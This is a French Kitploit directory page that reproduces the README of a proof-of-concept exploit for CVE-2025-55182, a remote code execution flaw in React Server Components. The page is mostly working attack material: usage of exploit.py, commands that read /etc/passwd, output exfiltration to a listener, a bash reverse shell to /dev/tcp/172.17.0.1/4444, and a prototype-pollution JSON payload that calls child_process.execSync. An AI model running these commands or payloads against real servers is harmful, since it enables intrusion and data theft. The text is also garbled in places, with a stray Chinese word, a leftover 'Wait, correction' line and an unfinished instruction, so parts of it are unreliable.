Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182 — CVE-2025-55182 React2Shell PoC | Kitploit
Outils/GitHubGitHub/lowercasenumbers/cve-2025-55182
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à Distance
GitHublowercasenumbers/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 React2Shell PoC

Voir le dépôt
il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182 - React2Shell PoC

Un exploit de preuve de概念 pour CVE-2025-55182, une vulnérabilité critique (CVSS 10.0) d'exécution de code à distance non authentifiée dans React Server Components.

Wait, correction. Let me write it properly:

CVE-2025-55182 - React2Shell PoC

Un exploit de preuve de concept pour CVE-2025-55182, une vulnérabilité critique (CVSS 10.0) d'exécution de code à distance non authentifiée dans React Server Components.

Crédits

Découvert par Lachlan Davidson - Divulgué à l'équipe Meta/React le 29 novembre 2025.

Aperçu de la vulnérabilité

La vulnérabilité réside dans la logique de désérialisation du protocole React Flight. En envoyant une charge utile malveillante via une requête HTTP POST, un attaquant peut provoquer une pollution de prototype qui mène à une exécution de code arbitraire sur le serveur.

Versions affectées

PaquetVersions vulnérables
react-server-dom-webpack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-parcel19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-turbopack19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js15.0.4, 15.1.8, 15.2.5, 15.3.5, 15.4.7, 15.5.6, 16.0.6

Frameworks affectés

  • Next.js
  • React Router (avec RSC)
  • Waku
  • @parcel/rsc
  • @vitejs/plugin-rsc
  • rwsdk (Redwood)

Fichiers

root@kitploit:~
.
├── exploit.py           # exploit script
├── docker-compose.yml   # Vulnerable test environment
├── vulnerable-app/      # Vulnerable Next.js application
└── README.md

Démarrage rapide

1. Démarrer le conteneur vulnérable

root@kitploit:~
docker compose up -d

Ceci démarre une application Next.js vulnérable sur http://localhost:3000.

2. Vérifier si la cible est vulnérable

root@kitploit:~
python3 exploit.py -u http://localhost:3000 --check

Ceci effectue une vérification non exploitante des indicateurs, notamment :

  • Détection du framework (Next.js, Waku, React Router, etc.)
  • Marqueurs du protocole Flight
  • Server Actions
  • Détection de version

3. Exploitation (exécution aveugle)

root@kitploit:~
python3 exploit.py -u http://localhost:3000 -c "id"

Exécute une commande sans afficher la sortie. Vérifiez avec :

4. Exploitation avec exfiltration de la sortie

root@kitploit:~
python3 exploit.py -u http://localhost:3000 -c "id" --exfil <IP>:<PORT>

Votre adresse IP ; Port d'écoute

Utilisation

root@kitploit:~
usage: exploit.py [-h] -u URL [-c COMMAND] [--check] [--exfil HOST:PORT]
                  [--timeout TIMEOUT] [--no-verify]

options:
  -u, --url URL         Target URL
  -c, --command CMD     Command to execute
  --check               Check if vulnerable (non-exploitative)
  --exfil HOST:PORT     Exfiltrate output to HOST:PORT
  --timeout TIMEOUT     Request timeout (default: 10)
  --no-verify           Disable SSL verification

Exemples

root@kitploit:~
# Check vulnerability
python3 exploit.py -u http://localhost:3000 --check

# Blind RCE
python3 exploit.py -u http://localhost:3000 -c "touch /tmp/pwned"

# RCE with output
python3 exploit.py -u http://localhost:3000 -c "whoami" --exfil 172.17.0.1:9999

# Read files
python3 exploit.py -u http://localhost:3000 -c "cat /etc/passwd" --exfil 172.17.0.1:9999

# Reverse shell
python3 exploit.py -u http://localhost:3000 -c "bash -c 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'"

Structure de la charge utile

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\": \"$B0\"}",
  "_response": {
    "_prefix": "process.mainModule.require('child_process').execSync('id');",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

Exfiltration

L'exploit corrompt l'état du serveur pendant l'exécution, ce qui rend l'exfiltration de la réponse dans la bande (in-band) peu fiable. L'option --exfil utilise une exfiltration hors bande (out-of-band) :

root@kitploit:~
┌──────────┐  1. Malicious POST   ┌──────────┐
│ Attacker │ ──────────────────►  │  Server  │
└──────────┘                      └──────────┘
     ▲                                 │
     │  3. Command output              │ 2. RCE executes:
     │     via nc                      │    cmd | nc attacker port
     │                                 ▼
     └─────────────────────────────────┘

Nettoyage

root@kitploit:~
docker compose down

Avertissement

Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. Ne l'utilisez que contre des systèmes que vous avez la permission de tester.

Références

  • Avis de sécurité React
  • NVD - CVE-2025-55182
  • Datadog Security Labs
Télécharger l’outil